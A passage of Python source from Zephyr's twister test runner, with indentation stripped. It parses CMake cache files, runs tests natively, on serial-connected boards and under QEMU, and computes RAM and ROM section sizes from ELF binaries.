:(?P<type>FILEPATH|PATH|STRING|BOOL|INTERNAL) # type
=(?P<value>.*) # value
''', re.X)
@classmethod
def _to_bool(cls, val):
# Convert a CMake BOOL string into a Python bool.
#
# "True if the constant is 1, ON, YES, TRUE, Y, or a
# non-zero number. False if the constant is 0, OFF, NO,
# FALSE, N, IGNORE, NOTFOUND, the empty string, or ends in
# the suffix -NOTFOUND. Named boolean constants are
# case-insensitive. If the argument is not one of these
# constants, it is treated as a variable."
#
# https://cmake.org/cmake/help/v3.0/command/if.html
val = val.upper()
if val in ('ON', 'YES', 'TRUE', 'Y'):
return 1
elif val in ('OFF', 'NO', 'FALSE', 'N', 'IGNORE', 'NOTFOUND', ''):
return 0
elif val.endswith('-NOTFOUND'):
return 0
else:
try:
v = int(val)
return v != 0
except ValueError as exc:
raise ValueError('invalid bool {}'.format(val)) from exc
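# For reference: 'ON'/'YES'/'TRUE'/'Y' map to 1; 'OFF', '', and values ending in
# '-NOTFOUND' map to 0; other numeric strings fall through to the int() check
# (e.g. '2' -> True, '0' -> False).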
@classmethod
def from_line(cls, line, line_no):
# Comments can only occur at the beginning of a line.
# (The value of an entry could contain a comment character).
if line.startswith('//') or line.startswith('#'):
return None
# Whitespace-only lines do not contain cache entries.
if not line.strip():
return None
m = cls.CACHE_ENTRY.match(line)
if not m:
return None
name, type_, value = (m.group(g) for g in ('name', 'type', 'value'))
if type_ == 'BOOL':
try:
value = cls._to_bool(value)
except ValueError as exc:
args = exc.args + ('on line {}: {}'.format(line_no, line),)
raise ValueError(args) from exc
elif type_ in ['STRING', 'INTERNAL']:
# If the value is a CMake list (i.e. is a string which
# contains a ';'), convert to a Python list.
if ';' in value:
value = value.split(';')
return CMakeCacheEntry(name, value)
def __init__(self, name, value):
self.name = name
self.value = value
def __str__(self):
fmt = 'CMakeCacheEntry(name={}, value={})'
return fmt.format(self.name, self.value)
class CMakeCache:
'''Parses and represents a CMake cache file.'''
@staticmethod
def from_file(cache_file):
return CMakeCache(cache_file)
def __init__(self, cache_file):
self.cache_file = cache_file
self.load(cache_file)
def load(self, cache_file):
entries = []
with open(cache_file, 'r') as cache:
for line_no, line in enumerate(cache):
entry = CMakeCacheEntry.from_line(line, line_no)
if entry:
entries.append(entry)
self._entries = OrderedDict((e.name, e) for e in entries)
def get(self, name, default=None):
entry = self._entries.get(name)
if entry is not None:
return entry.value
else:
return default
def get_list(self, name, default=None):
if default is None:
default = []
entry = self._entries.get(name)
if entry is not None:
value = entry.value
if isinstance(value, list):
return value
elif isinstance(value, str):
return [value] if value else []
else:
msg = 'invalid value {} type {}'
raise RuntimeError(msg.format(value, type(value)))
else:
return default
def __contains__(self, name):
return name in self._entries
def __getitem__(self, name):
return self._entries[name].value
def __setitem__(self, name, entry):
if not isinstance(entry, CMakeCacheEntry):
msg = 'improper type {} for value {}, expecting CMakeCacheEntry'
raise TypeError(msg.format(type(entry), entry))
self._entries[name] = entry
def __delitem__(self, name):
del self._entries[name]
def __iter__(self):
return iter(self._entries.values())
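# Minimal usage sketch (hypothetical cache path and variable names):
#   cache = CMakeCache.from_file('build/CMakeCache.txt')
#   build_type = cache.get('CMAKE_BUILD_TYPE', 'Debug')
#   flags = cache.get_list('SOME_LIST_VAR')  # always a list, possibly empty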
class TwisterException(Exception):
pass
class TwisterRuntimeError(TwisterException):
pass
class ConfigurationError(TwisterException):
def __init__(self, cfile, message):
TwisterException.__init__(self, cfile + ": " + message)
class BuildError(TwisterException):
pass
class ExecutionError(TwisterException):
pass
class HarnessImporter:
def __init__(self, name):
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts/pylib/twister"))
module = __import__("harness")
if name:
my_class = getattr(module, name)
else:
my_class = getattr(module, "Test")
self.instance = my_class()
class Handler:
def __init__(self, instance, type_str="build"):
"""Constructor
"""
self.state = "waiting"
self.run = False
self.duration = 0
self.type_str = type_str
self.binary = None
self.pid_fn = None
self.call_make_run = False
self.name = instance.name
self.instance = instance
self.timeout = instance.testcase.timeout
self.sourcedir = instance.testcase.source_dir
self.build_dir = instance.build_dir
self.log = os.path.join(self.build_dir, "handler.log")
self.returncode = 0
self.set_state("running", self.duration)
self.generator = None
self.generator_cmd = None
self.suite_name_check = True
self.args = []
self.terminated = False
def set_state(self, state, duration):
self.state = state
self.duration = duration
def get_state(self):
ret = (self.state, self.duration)
return ret
def record(self, harness):
if harness.recording:
filename = os.path.join(self.build_dir, "recording.csv")
with open(filename, "at") as csvfile:
cw = csv.writer(csvfile, harness.fieldnames, lineterminator=os.linesep)
cw.writerow(harness.fieldnames)
for instance in harness.recording:
cw.writerow(instance)
def terminate(self, proc):
# encapsulate terminate functionality so we do it consistently wherever
# we might want to terminate the proc. We need try_kill_process_by_pid
# because of how both newer ninja (1.6.0 or greater) and .NET / renode
# work. Newer ninjas don't seem to pass SIGTERM down to their children,
# so we need to use try_kill_process_by_pid.
for child in psutil.Process(proc.pid).children(recursive=True):
try:
os.kill(child.pid, signal.SIGTERM)
except ProcessLookupError:
pass
proc.terminate()
# sleep for a while before attempting to kill
time.sleep(0.5)
proc.kill()
self.terminated = True
def add_missing_testscases(self, harness):
"""
If testsuite was broken by some error (e.g. timeout) it is necessary to
add information about next testcases, which were not be
performed due to this error.
"""
for c in self.instance.testcase.cases:
if c not in harness.tests:
harness.tests[c] = "BLOCK"
def _set_skip_reason(self, harness_state):
"""
If testcase written in ztest framework is skipped by "ztest_test_skip()"
function, then such testcase is marked in instance.results dict as
"SKIP", but reason of this sipping still "Unknown". This method pick up
this situation and complete the instance.reason properly.
"""
harness_state_pass = "passed"
harness_testcase_result_skip = "SKIP"
instance_reason_unknown = "Unknown"
if harness_state == harness_state_pass and \
self.instance.reason == instance_reason_unknown and \
harness_testcase_result_skip in self.instance.results.values():
self.instance.reason = "ztest skip"
def _verify_ztest_suite_name(self, harness_state, detected_suite_names, handler_time):
"""
If test suite names was found in test's C source code, then verify if
detected suite names from output correspond to expected suite names
(and not in reverse).
"""
expected_suite_names = self.instance.testcase.ztest_suite_names
if not expected_suite_names or \
not harness_state == "passed":
return
if not detected_suite_names:
self._missing_suite_name(expected_suite_names, handler_time)
for detected_suite_name in detected_suite_names:
if detected_suite_name not in expected_suite_names:
self._missing_suite_name(expected_suite_names, handler_time)
break
def _missing_suite_name(self, expected_suite_names, handler_time):
"""
Change result of performed test if problem with missing or unpropper
suite name was occurred.
"""
self.set_state("failed", handler_time)
for k in self.instance.testcase.cases:
self.instance.results[k] = "FAIL"
self.instance.reason = f"Testsuite mismatch"
logger.debug("Test suite names were not printed or some of them in " \
"output do not correspond with expected: %s",
str(expected_suite_names))
def _final_handle_actions(self, harness, handler_time):
self._set_skip_reason(harness.state)
# only for Ztest tests:
harness_class_name = type(harness).__name__
if self.suite_name_check and harness_class_name == "Test":
self._verify_ztest_suite_name(harness.state, harness.detected_suite_names, handler_time)
if not harness.matched_run_id and harness.run_id_exists:
self.set_state("failed", handler_time)
self.instance.reason = "RunID mismatch"
for k in self.instance.testcase.cases:
self.instance.results[k] = "FAIL"
self.record(harness)
class BinaryHandler(Handler):
def __init__(self, instance, type_str):
"""Constructor
@param instance Test Instance
"""
super().__init__(instance, type_str)
self.call_west_flash = False
# Tool options
self.valgrind = False
self.lsan = False
self.asan = False
self.ubsan = False
self.coverage = False
def try_kill_process_by_pid(self):
if self.pid_fn:
pid = int(open(self.pid_fn).read())
os.unlink(self.pid_fn)
self.pid_fn = None # clear so we don't try to kill the binary twice
try:
os.kill(pid, signal.SIGTERM)
except ProcessLookupError:
pass
def _output_reader(self, proc):
self.line = proc.stdout.readline()
def _output_handler(self, proc, harness):
if harness.is_pytest:
harness.handle(None)
return
log_out_fp = open(self.log, "wt")
timeout_extended = False
timeout_time = time.time() + self.timeout
while True:
this_timeout = timeout_time - time.time()
if this_timeout < 0:
break
reader_t = threading.Thread(target=self._output_reader, args=(proc,), daemon=True)
reader_t.start()
reader_t.join(this_timeout)
if not reader_t.is_alive():
line = self.line
logger.debug("OUTPUT: {0}".format(line.decode('utf-8').rstrip()))
log_out_fp.write(line.decode('utf-8'))
log_out_fp.flush()
harness.handle(line.decode('utf-8').rstrip())
if harness.state:
if not timeout_extended or harness.capture_coverage:
timeout_extended = True
if harness.capture_coverage:
timeout_time = time.time() + 30
else:
timeout_time = time.time() + 2
else:
reader_t.join(0)
break
try:
# POSIX arch based ztests end on their own,
# so let's give it up to 100ms to do so
proc.wait(0.1)
except subprocess.TimeoutExpired:
self.terminate(proc)
log_out_fp.close()
def handle(self):
harness_name = self.instance.testcase.harness.capitalize()
harness_import = HarnessImporter(harness_name)
harness = harness_import.instance
harness.configure(self.instance)
if self.call_make_run:
command = [self.generator_cmd, "run"]
elif self.call_west_flash:
command = ["west", "flash", "--skip-rebuild", "-d", self.build_dir]
else:
command = [self.binary]
run_valgrind = False
if self.valgrind:
command = ["valgrind", "--error-exitcode=2",
"--leak-check=full",
"--suppressions=" + ZEPHYR_BASE + "/scripts/valgrind.supp",
"--log-file=" + self.build_dir + "/valgrind.log",
"--track-origins=yes",
] + command
run_valgrind = True
logger.debug("Spawning process: " +
" ".join(shlex.quote(word) for word in command) + os.linesep +
"in directory: " + self.build_dir)
start_time = time.time()
env = os.environ.copy()
if self.asan:
env["ASAN_OPTIONS"] = "log_path=stdout:" + \
env.get("ASAN_OPTIONS", "")
if not self.lsan:
env["ASAN_OPTIONS"] += "detect_leaks=0"
if self.ubsan:
env["UBSAN_OPTIONS"] = "log_path=stdout:halt_on_error=1:" + \
env.get("UBSAN_OPTIONS", "")
with subprocess.Popen(command, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, cwd=self.build_dir, env=env) as proc:
logger.debug("Spawning BinaryHandler Thread for %s" % self.name)
t = threading.Thread(target=self._output_handler, args=(proc, harness,), daemon=True)
t.start()
t.join()
if t.is_alive():
self.terminate(proc)
t.join()
proc.wait()
self.returncode = proc.returncode
self.try_kill_process_by_pid()
handler_time = time.time() - start_time
if self.coverage:
subprocess.call(["GCOV_PREFIX=" + self.build_dir,
"gcov", self.sourcedir, "-b", "-s", self.build_dir], shell=True)
# FIXME: This is needed when killing the simulator, the console is
# garbled and needs to be reset. Did not find a better way to do that.
if sys.stdout.isatty():
subprocess.call(["stty", "sane"])
if harness.is_pytest:
harness.pytest_run(self.log)
self.instance.results = harness.tests
if not self.terminated and self.returncode != 0:
if run_valgrind and self.returncode == 2:
self.set_state("failed", handler_time)
self.instance.reason = "Valgrind error"
else:
# When a process is killed, the default handler returns 128 + SIGTERM
# so in that case the return code itself is not meaningful
self.set_state("failed", handler_time)
self.instance.reason = "Failed"
elif harness.state:
self.set_state(harness.state, handler_time)
if harness.state == "failed":
self.instance.reason = "Failed"
else:
self.set_state("timeout", handler_time)
self.instance.reason = "Timeout"
self.add_missing_testscases(harness)
self._final_handle_actions(harness, handler_time)
class DeviceHandler(Handler):
def __init__(self, instance, type_str):
"""Constructor
@param instance Test Instance
"""
super().__init__(instance, type_str)
self.suite = None
def monitor_serial(self, ser, halt_fileno, harness):
if harness.is_pytest:
harness.handle(None)
return
log_out_fp = open(self.log, "wt")
ser_fileno = ser.fileno()
readlist = [halt_fileno, ser_fileno]
if self.coverage:
# Set capture_coverage to True to indicate that right after
# test results we should get coverage data, otherwise we exit
# from the test.
harness.capture_coverage = True
ser.flush()
while ser.isOpen():
readable, _, _ = select.select(readlist, [], [], self.timeout)
if halt_fileno in readable:
logger.debug('halted')
ser.close()
break
if ser_fileno not in readable:
continue # Timeout.
serial_line = None
try:
serial_line = ser.readline()
except TypeError:
pass
except serial.SerialException:
ser.close()
break
# Just because ser_fileno has data doesn't mean an entire line
# is available yet.
if serial_line:
sl = serial_line.decode('utf-8', 'ignore').lstrip()
logger.debug("DEVICE: {0}".format(sl.rstrip()))
log_out_fp.write(sl)
log_out_fp.flush()
harness.handle(sl.rstrip())
if harness.state:
if not harness.capture_coverage:
ser.close()
break
log_out_fp.close()
def device_is_available(self, instance):
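# A DUT is considered available when it provides the fixture required by
# the test (if any), its platform matches this instance's platform, and a
# serial port or serial_pty is configured for it. The DUT is claimed
# atomically under its lock so concurrent handlers cannot grab the same
# device.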
device = instance.platform.name
fixture = instance.testcase.harness_config.get("fixture")
for d in self.suite.duts:
if fixture and fixture not in d.fixtures:
continue
if d.platform != device or (d.serial is None and d.serial_pty is None):
continue
d.lock.acquire()
avail = False
if d.available:
d.available = 0
d.counter += 1
avail = True
d.lock.release()
if avail:
return d
return None
def make_device_available(self, serial):
for d in self.suite.duts:
if d.serial == serial or d.serial_pty:
d.available = 1
@staticmethod
def run_custom_script(script, timeout):
with subprocess.Popen(script, stderr=subprocess.PIPE, stdout=subprocess.PIPE) as proc:
try:
stdout, stderr = proc.communicate(timeout=timeout)
logger.debug(stdout.decode())
if proc.returncode != 0:
logger.error(f"Custom script failure: {stderr.decode(errors='ignore')}")
except subprocess.TimeoutExpired:
proc.kill()
proc.communicate()
logger.error("{} timed out".format(script))
def handle(self):
out_state = "failed"
runner = None
hardware = self.device_is_available(self.instance)
while not hardware:
logger.debug("Waiting for device {} to become available".format(self.instance.platform.name))
time.sleep(1)
hardware = self.device_is_available(self.instance)
runner = hardware.runner or self.suite.west_runner
serial_pty = hardware.serial_pty
ser_pty_process = None
if serial_pty:
master, slave = pty.openpty()
try:
ser_pty_process = subprocess.Popen(re.split(',| ', serial_pty), stdout=master, stdin=master, stderr=master)
except subprocess.CalledProcessError as error:
logger.error("Failed to run subprocess {}, error {}".format(serial_pty, error.output))
return
serial_device = os.ttyname(slave)
else:
serial_device = hardware.serial
logger.debug(f"Using serial device {serial_device} @ {hardware.baud} baud")
if (self.suite.west_flash is not None) or runner:
command = ["west", "flash", "--skip-rebuild", "-d", self.build_dir]
command_extra_args = []
# There are three ways this option is used.
# 1) bare: --west-flash
# This results in options.west_flash == []
# 2) with a value: --west-flash="--board-id=42"
# This results in options.west_flash == "--board-id=42"
# 3) Multiple values: --west-flash="--board-id=42,--erase"
# This results in options.west_flash == "--board-id=42 --erase"
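# Illustrative example: --west-flash="--board-id=42,--erase" yields
# command_extra_args == ["--board-id=42", "--erase"], which is appended
# after a "--" separator further below.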
if self.suite.west_flash and self.suite.west_flash != []:
command_extra_args.extend(self.suite.west_flash.split(','))
if runner:
command.append("--runner")
command.append(runner)
board_id = hardware.probe_id or hardware.id
product = hardware.product
if board_id is not None:
if runner == "pyocd":
command_extra_args.append("--board-id")
command_extra_args.append(board_id)
elif runner == "nrfjprog":
command_extra_args.append("--dev-id")
command_extra_args.append(board_id)
elif runner == "openocd" and product == "STM32 STLink":
command_extra_args.append("--cmd-pre-init")
command_extra_args.append("hla_serial %s" % (board_id))
elif runner == "openocd" and product == "STLINK-V3":
command_extra_args.append("--cmd-pre-init")
command_extra_args.append("hla_serial %s" % (board_id))
elif runner == "openocd" and product == "EDBG CMSIS-DAP":
command_extra_args.append("--cmd-pre-init")
command_extra_args.append("cmsis_dap_serial %s" % (board_id))
elif runner == "jlink":
command.append("--tool-opt=-SelectEmuBySN %s" % (board_id))
elif runner == "stm32cubeprogrammer":
command.append("--tool-opt=sn=%s" % (board_id))
if command_extra_args != []:
command.append('--')
command.extend(command_extra_args)
else:
command = [self.generator_cmd, "-C", self.build_dir, "flash"]
pre_script = hardware.pre_script
post_flash_script = hardware.post_flash_script
post_script = hardware.post_script
if pre_script:
self.run_custom_script(pre_script, 30)
try:
ser = serial.Serial(
serial_device,
baudrate=hardware.baud,
parity=serial.PARITY_NONE,
stopbits=serial.STOPBITS_ONE,
bytesize=serial.EIGHTBITS,
timeout=self.timeout
)
except serial.SerialException as e:
self.set_state("failed", 0)
self.instance.reason = "Failed"
logger.error("Serial device error: %s" % (str(e)))
if serial_pty and ser_pty_process:
ser_pty_process.terminate()
outs, errs = ser_pty_process.communicate()
logger.debug("Process {} terminated outs: {} errs {}".format(serial_pty, outs, errs))
self.make_device_available(serial_device)
return
ser.flush()
harness_name = self.instance.testcase.harness.capitalize()
harness_import = HarnessImporter(harness_name)
harness = harness_import.instance
harness.configure(self.instance)
read_pipe, write_pipe = os.pipe()
start_time = time.time()
t = threading.Thread(target=self.monitor_serial, daemon=True,
args=(ser, read_pipe, harness))
t.start()
d_log = "{}/device.log".format(self.instance.build_dir)
logger.debug('Flash command: %s', command)
try:
stdout = stderr = None
with subprocess.Popen(command, stderr=subprocess.PIPE, stdout=subprocess.PIPE) as proc:
try:
(stdout, stderr) = proc.communicate(timeout=30)
# ignore unencodable unicode chars
logger.debug(stdout.decode(errors = "ignore"))
if proc.returncode != 0:
self.instance.reason = "Device issue (Flash?)"
with open(d_log, "w") as dlog_fp:
dlog_fp.write(stderr.decode())
os.write(write_pipe, b'x') # halt the thread
out_state = "flash_error"
except subprocess.TimeoutExpired:
proc.kill()
(stdout, stderr) = proc.communicate()
self.instance.reason = "Device issue (Timeout)"
with open(d_log, "w") as dlog_fp:
dlog_fp.write(stderr.decode())
except subprocess.CalledProcessError:
os.write(write_pipe, b'x') # halt the thread
if post_flash_script:
self.run_custom_script(post_flash_script, 30)
t.join(self.timeout)
if t.is_alive():
logger.debug("Timed out while monitoring serial output on {}".format(self.instance.platform.name))
out_state = "timeout"
if ser.isOpen():
ser.close()
if serial_pty:
ser_pty_process.terminate()
outs, errs = ser_pty_process.communicate()
logger.debug("Process {} terminated outs: {} errs {}".format(serial_pty, outs, errs))
os.close(write_pipe)
os.close(read_pipe)
handler_time = time.time() - start_time
if out_state in ["timeout", "flash_error"]:
self.add_missing_testscases(harness)
if out_state == "timeout":
self.instance.reason = "Timeout"
elif out_state == "flash_error":
self.instance.reason = "Flash error"
if harness.is_pytest:
harness.pytest_run(self.log)
self.instance.results = harness.tests
# A test instance that was not executed successfully may end up with an
# empty results dictionary; fill its results with BLOCK so it is still
# included in the final report.
if self.instance.results == {}:
for k in self.instance.testcase.cases:
self.instance.results[k] = 'BLOCK'
if harness.state:
self.set_state(harness.state, handler_time)
if harness.state == "failed":
self.instance.reason = "Failed"
else:
self.set_state(out_state, handler_time)
self._final_handle_actions(harness, handler_time)
if post_script:
self.run_custom_script(post_script, 30)
self.make_device_available(serial_device)
class QEMUHandler(Handler):
"""Spawns a thread to monitor QEMU output from pipes
We pass QEMU_PIPE to 'make run' and monitor the pipes for output.
We need to do this as once qemu starts, it runs forever until killed.
Test cases emit special messages to the console as they run, we check
for these to collect whether the test passed or failed.
"""
def __init__(self, instance, type_str):
"""Constructor
@param instance Test instance
"""
super().__init__(instance, type_str)
self.fifo_fn = os.path.join(instance.build_dir, "qemu-fifo")
self.pid_fn = os.path.join(instance.build_dir, "qemu.pid")
if "ignore_qemu_crash" in instance.testcase.tags:
self.ignore_qemu_crash = True
self.ignore_unexpected_eof = True
else:
self.ignore_qemu_crash = False
self.ignore_unexpected_eof = False
@staticmethod
def _get_cpu_time(pid):
"""get process CPU time.
The guest virtual time in QEMU icount mode isn't host time and
it's maintained by counting guest instructions, so we use QEMU
process execution time to approximate the time spent by the guest OS.
"""
proc = psutil.Process(pid)
cpu_time = proc.cpu_times()
return cpu_time.user + cpu_time.system
@staticmethod
def _thread(handler, timeout, outdir, logfile, fifo_fn, pid_fn, results, harness,
ignore_unexpected_eof=False):
fifo_in = fifo_fn + ".in"
fifo_out = fifo_fn + ".out"
# These in/out nodes are named from QEMU's perspective, not ours
if os.path.exists(fifo_in):
os.unlink(fifo_in)
os.mkfifo(fifo_in)
if os.path.exists(fifo_out):
os.unlink(fifo_out)
os.mkfifo(fifo_out)
# We don't do anything with out_fp but we need to open it for
# writing so that QEMU doesn't block, due to the way pipes work
out_fp = open(fifo_in, "wb")
# Disable internal buffering, we don't
# want read() or poll() to ever block if there is data in there
in_fp = open(fifo_out, "rb", buffering=0)
log_out_fp = open(logfile, "wt")
start_time = time.time()
timeout_time = start_time + timeout
p = select.poll()
p.register(in_fp, select.POLLIN)
out_state = None
line = ""
timeout_extended = False
pid = 0
if os.path.exists(pid_fn):
pid = int(open(pid_fn).read())
while True:
this_timeout = int((timeout_time - time.time()) * 1000)
if this_timeout < 0 or not p.poll(this_timeout):
try:
if pid and this_timeout > 0:
# It is possible that we polled nothing because the host did not
# schedule enough CPU time to the QEMU process during
# p.poll(this_timeout).
cpu_time = QEMUHandler._get_cpu_time(pid)
if cpu_time < timeout and not out_state:
timeout_time = time.time() + (timeout - cpu_time)
continue
except ProcessLookupError:
out_state = "failed"
break
if not out_state:
out_state = "timeout"
break
if pid == 0 and os.path.exists(pid_fn):
pid = int(open(pid_fn).read())
if harness.is_pytest:
harness.handle(None)
out_state = harness.state
break
try:
c = in_fp.read(1).decode("utf-8")
except UnicodeDecodeError:
# Test is writing something weird, fail
out_state = "unexpected byte"
break
if c == "":
# EOF, this shouldn't happen unless QEMU crashes
if not ignore_unexpected_eof:
out_state = "unexpected eof"
break
line = line + c
if c != "\n":
continue
# line contains a full line of data output from QEMU
log_out_fp.write(line)
log_out_fp.flush()
line = line.strip()
logger.debug(f"QEMU ({pid}): {line}")
harness.handle(line)
if harness.state:
# if we have registered a fail make sure the state is not
# overridden by a false success message coming from the
# testsuite
if out_state not in ['failed', 'unexpected eof', 'unexpected byte']:
out_state = harness.state
# If we got some state, the test is making progress: reset the timeout
# and wait 2 more seconds to catch anything printed late. We wait much
# longer if code coverage is enabled, since dumping that information
# can take some time.
if not timeout_extended or harness.capture_coverage:
timeout_extended = True
if harness.capture_coverage:
timeout_time = time.time() + 30
else:
timeout_time = time.time() + 2
line = ""
if harness.is_pytest:
harness.pytest_run(logfile)
out_state = harness.state
handler_time = time.time() - start_time
logger.debug(f"QEMU ({pid}) complete ({out_state}) after {handler_time} seconds")
if out_state == "timeout":
handler.instance.reason = "Timeout"
handler.set_state("failed", handler_time)
elif out_state == "failed":
handler.instance.reason = "Failed"
handler.set_state("failed", handler_time)
elif out_state in ['unexpected eof', 'unexpected byte']:
handler.instance.reason = out_state
handler.set_state("failed", handler_time)
else:
handler.set_state(out_state, handler_time)
log_out_fp.close()
out_fp.close()
in_fp.close()
if pid:
try:
os.kill(pid, signal.SIGTERM)
except ProcessLookupError:
# Oh well, as long as it's dead! User probably sent Ctrl-C
pass
os.unlink(fifo_in)
os.unlink(fifo_out)
def handle(self):
self.results = {}
self.run = True
# We pass this to QEMU which looks for fifos with .in and .out
# suffixes.
self.fifo_fn = os.path.join(self.instance.build_dir, "qemu-fifo")
self.pid_fn = os.path.join(self.instance.build_dir, "qemu.pid")
if os.path.exists(self.pid_fn):
os.unlink(self.pid_fn)
self.log_fn = self.log
harness_import = HarnessImporter(self.instance.testcase.harness.capitalize())
harness = harness_import.instance
harness.configure(self.instance)
self.thread = threading.Thread(name=self.name, target=QEMUHandler._thread,
args=(self, self.timeout, self.build_dir,
self.log_fn, self.fifo_fn,
self.pid_fn, self.results, harness,
self.ignore_unexpected_eof))
self.instance.results = harness.tests
self.thread.daemon = True
logger.debug("Spawning QEMUHandler Thread for %s" % self.name)
self.thread.start()
if sys.stdout.isatty():
subprocess.call(["stty", "sane"])
logger.debug("Running %s (%s)" % (self.name, self.type_str))
command = [self.generator_cmd]
command += ["-C", self.build_dir, "run"]
is_timeout = False
qemu_pid = None
with subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=self.build_dir) as proc:
logger.debug("Spawning QEMUHandler Thread for %s" % self.name)
try:
proc.wait(self.timeout)
except subprocess.TimeoutExpired:
# Sometimes QEMU cannot handle the SIGTERM signal correctly; in that
# case kill the QEMU process directly (kill -9) and let twister judge
# the test result from the console output.
is_timeout = True
self.terminate(proc)
if harness.state == "passed":
self.returncode = 0
else:
self.returncode = proc.returncode
else:
if os.path.exists(self.pid_fn):
qemu_pid = int(open(self.pid_fn).read())
logger.debug(f"No timeout, return code from QEMU ({qemu_pid}): {proc.returncode}")
self.returncode = proc.returncode
# Need to wait for harness to finish processing
# output from QEMU. Otherwise it might miss some
# error messages.
self.thread.join(0)
if self.thread.is_alive():
logger.debug("Timed out while monitoring QEMU output")
if os.path.exists(self.pid_fn):
qemu_pid = int(open(self.pid_fn).read())
os.unlink(self.pid_fn)
logger.debug(f"return code from QEMU ({qemu_pid}): {self.returncode}")
if (self.returncode != 0 and not self.ignore_qemu_crash) or not harness.state:
self.set_state("failed", 0)
if is_timeout:
self.instance.reason = "Timeout"
else:
self.instance.reason = "Exited with {}".format(self.returncode)
self.add_missing_testscases(harness)
self._final_handle_actions(harness, 0)
def get_fifo(self):
return self.fifo_fn
class SizeCalculator:
alloc_sections = [
"bss",
"noinit",
"app_bss",
"app_noinit",
"ccm_bss",
"ccm_noinit"
]
rw_sections = [
"datas",
"initlevel",
"exceptions",
"initshell",
"_static_thread_data_area",
"k_timer_area",
"k_mem_slab_area",
"k_mem_pool_area",
"sw_isr_table",
"k_sem_area",
"k_mutex_area",
"app_shmem_regions",
"_k_fifo_area",
"_k_lifo_area",
"k_stack_area",
"k_msgq_area",
"k_mbox_area",
"k_pipe_area",
"net_if_area",
"net_if_dev_area",
"net_l2_area",
"net_l2_data",
"k_queue_area",
"_net_buf_pool_area",
"app_datas",
"kobject_data",
"mmu_tables",
"app_pad",
"priv_stacks",
"ccm_data",
"usb_descriptor",
"usb_data", "usb_bos_desc",
"uart_mux",
'log_backends_sections',
'log_dynamic_sections',
'log_const_sections',
"app_smem",
'shell_root_cmds_sections',
'log_const_sections',
"font_entry_sections",
"priv_stacks_noinit",
"_GCOV_BSS_SECTION_NAME",
"gcov",
"nocache",
"devices",
"k_heap_area",
]
# These get copied into RAM only on non-XIP
ro_sections = [
"rom_start",
"text",
"ctors",
"init_array",
"reset",
"z_object_assignment_area",
"rodata",
"net_l2",
"vector",
"sw_isr_table",
"settings_handler_static_area",
"bt_l2cap_fixed_chan_area",
"bt_l2cap_br_fixed_chan_area",
"bt_gatt_service_static_area",
"vectors",
"net_socket_register_area",
"net_ppp_proto",
"shell_area",
"tracing_backend_area",
"ppp_protocol_handler_area",
]
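# How _calculate_sizes() treats these groups: alloc_sections count towards
# RAM only, rw_sections count towards both RAM and ROM, and ro_sections
# count towards ROM (plus RAM when the image is not XIP).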
def __init__(self, filename, extra_sections):
"""Constructor
@param filename Path to the output binary
The <filename> is parsed by objdump to determine section sizes
"""
# Make sure this is an ELF binary
with open(filename, "rb") as f:
magic = f.read(4)
try:
if magic != b'\x7fELF':
raise TwisterRuntimeError("%s is not an ELF binary" % filename)
except Exception as e:
print(str(e))
sys.exit(2)
# Search for CONFIG_XIP in the ELF's list of symbols using NM and AWK.
# GREP cannot be used because it returns an error if the symbol is not
# found.
is_xip_command = "nm " + filename + \
" | awk '/CONFIG_XIP/ { print $3 }'"
is_xip_output = subprocess.check_output(
is_xip_command, shell=True, stderr=subprocess.STDOUT).decode(
"utf-8").strip()
try:
if is_xip_output.endswith("no symbols"):
raise TwisterRuntimeError("%s has no symbol information" % filename)
except Exception as e:
print(str(e))
sys.exit(2)
self.is_xip = (len(is_xip_output) != 0)
self.filename = filename
self.sections = []
self.rom_size = 0
self.ram_size = 0
self.extra_sections = extra_sections
self._calculate_sizes()
def get_ram_size(self):
"""Get the amount of RAM the application will use up on the device
@return amount of RAM, in bytes
"""
return self.ram_size
def get_rom_size(self):
"""Get the size of the data that this application uses on device's flash
@return amount of ROM, in bytes
"""
return self.rom_size
def unrecognized_sections(self):
"""Get a list of sections inside the binary that weren't recognized
@return list of unrecognized section names
"""
slist = []
for v in self.sections:
if not v["recognized"]:
slist.append(v["name"])
return slist
def _calculate_sizes(self):
""" Calculate RAM and ROM usage by section """
objdump_command = "objdump -h " + self.filename
objdump_output = subprocess.check_output(
objdump_command, shell=True).decode("utf-8").splitlines()
for line in objdump_output:
words = line.split()
if not words: # Skip lines that are too short
continue
index = words[0]
if not index[0].isdigit(): # Skip lines that do not start
continue # with a digit
name = words[1] # Skip lines with section names
if name[0] == '.': # starting with '.'
continue
# TODO this doesn't actually reflect the size in flash or RAM as
# it doesn't include linker-imposed padding between sections.
# It is close though.
size = int(words[2], 16)
if size == 0:
continue
load_addr = int(words[4], 16)
virt_addr = int(words[3], 16)
# Add section to memory use totals (for both non-XIP and XIP scenarios)
# Unrecognized section names are not included in the calculations.
recognized = True
if name in SizeCalculator.alloc_sections:
self.ram_size += size
stype = "alloc"
elif name in SizeCalculator.rw_sections:
self.ram_size += size
self.rom_size += size
stype = "rw"
elif name in SizeCalculator.ro_sections:
self.rom_size += size
if not self.is_xip:
self.ram_size += size
stype = "ro"
else:
stype = "unknown"
if name not in self.extra_sections:
recognized = False
self.sections.append({"name": name, "load_addr": load_addr,
"size": size, "virt_addr": virt_addr,
"type": stype, "recognized": recognized})
class TwisterConfigParser:
"""Class to read test case files with semantic checking
"""
def __init__(self, filename, schema):
"""Instantiate a new TwisterConfigParser object
@param filename Source .yaml file to read
"""
self.data = {}
self.schema = schema
self.filename = filename
self.tests = {}
self.common = {}
def load(self):
self.data = scl.yaml_load_verify(self.filename, self.schema)
if 'tests' in self.data:
self.tests = self.data['tests']
if 'common' in self.data:
self.common = self.data['common']
def _cast_value(self, value, typestr):
if isinstance(value, str):
v = value.strip()
if typestr == "str":
return v
elif typestr == "float":
return float(value)
elif typestr == "int":
return int(value)
elif typestr == "bool":
return value
elif typestr.startswith("list") and isinstance(value, list):
return value
elif typestr.startswith("list") and isinstance(value, str):
vs = v.split()
if len(typestr) > 4 and typestr[4] == ":":
return [self._cast_value(vsi, typestr[5:]) for vsi in vs]
else:
return vs
elif typestr.startswith("set"):
vs = v.split()
if len(typestr) > 3 and typestr[3] == ":":
return {self._cast_value(vsi, typestr[4:]) for vsi in vs}
else:
return set(vs)
elif typestr.startswith("map"):
return value
else:
raise ConfigurationError(
self.filename, "unknown type '%s'" % typestr)
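# Illustrative examples of the casts above:
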